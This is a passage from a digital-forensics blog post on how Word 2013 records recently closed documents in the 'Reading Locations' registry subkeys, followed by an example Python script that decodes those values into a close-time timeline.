     Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated; however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten.

     Posted by Jason Hale at 11:51 PM

     Source: Digital Forensics Stream: MS Word 2013 Reading Locations
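     Because entries are updated in place and the 51st document overwrites "Document 49", the subkey number says nothing about recency; an examiner has to order the entries by their Datetime value. As an added example (not from the post), the Python below decodes the three values in the on-disk form the post describes (null-terminated UTF-16LE strings), parses the YYYY-MM-DDTHH:MM timestamp and the two-field Position, sorts the entries most-recently-closed first, and flags which documents were scrolled past the start. The sample subkeys, paths and times are constructed; the registry path and the 50-slot limit come from the post.

```python
"""Decode Word 2013 'Reading Locations' values into a close-time timeline (example code)."""
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple

SUBKEY_PATH = r"Software\Microsoft\Office\15.0\Word\Reading Locations"
MAX_SLOTS = 50  # the post observes 50 tracked files, "Document 0" .. "Document 49"


class ReadingLocation(NamedTuple):
    subkey: str
    closed: datetime          # local time the file was last closed
    file_path: str
    position: Tuple[int, int]


def reg_sz(raw: bytes) -> str:
    """Decode a value as it sits in the hive: UTF-16LE text terminated by a null."""
    return raw.decode("utf-16-le").split("\x00", 1)[0]


def encode_reg_sz(text: str) -> bytes:
    """Inverse of reg_sz; used only to construct the sample data below."""
    return (text + "\x00").encode("utf-16-le")


def parse_entry(subkey: str, values: Dict[str, bytes]) -> ReadingLocation:
    closed = datetime.strptime(reg_sz(values["Datetime"]), "%Y-%m-%dT%H:%M")
    first, second = reg_sz(values["Position"]).split()
    return ReadingLocation(subkey, closed, reg_sz(values["File Path"]), (int(first), int(second)))


def timeline(subkeys: Dict[str, Dict[str, bytes]]) -> List[ReadingLocation]:
    """All entries, most recently closed first; subkey numbering is not chronological."""
    return sorted((parse_entry(name, values) for name, values in subkeys.items()),
                  key=lambda entry: entry.closed, reverse=True)


def scrolled_past_start(entry: ReadingLocation) -> bool:
    """'0 0' means closed without scrolling; a non-zero second field means the user moved on."""
    return entry.position[1] > 0


def next_slot(existing: List[str]) -> str:
    """Subkey the next newly closed document lands in, per the post's observation."""
    return f"Document {min(len(existing), MAX_SLOTS - 1)}"


# Constructed sample values in the on-disk encoding; paths and times are made up.
SAMPLE = {
    "Document 0": {"Datetime": encode_reg_sz("2014-02-10T21:03"),
                   "File Path": encode_reg_sz(r"C:\Users\alice\Documents\report.docx"),
                   "Position": encode_reg_sz("0 1500")},
    "Document 1": {"Datetime": encode_reg_sz("2014-02-12T09:17"),
                   "File Path": encode_reg_sz(r"C:\Users\alice\Desktop\notes.docx"),
                   "Position": encode_reg_sz("0 0")},
    "Document 2": {"Datetime": encode_reg_sz("2014-02-11T14:40"),
                   "File Path": encode_reg_sz(r"D:\share\contract.doc"),
                   "Position": encode_reg_sz("0 320")},
}

if __name__ == "__main__":
    for entry in timeline(SAMPLE):
        flag = "scrolled" if scrolled_past_start(entry) else "not scrolled"
        print(f"{entry.closed:%Y-%m-%d %H:%M}  {entry.subkey:<11} {flag:<13} {entry.file_path}")
```

     In practice the value bytes would come from a hive parser pointed at the subkey path in SUBKEY_PATH under NTUSER.DAT; the decoding and ordering are the same. Keep in mind that Datetime is local time with no zone, so correlating it with other artefacts needs the machine's time-zone setting.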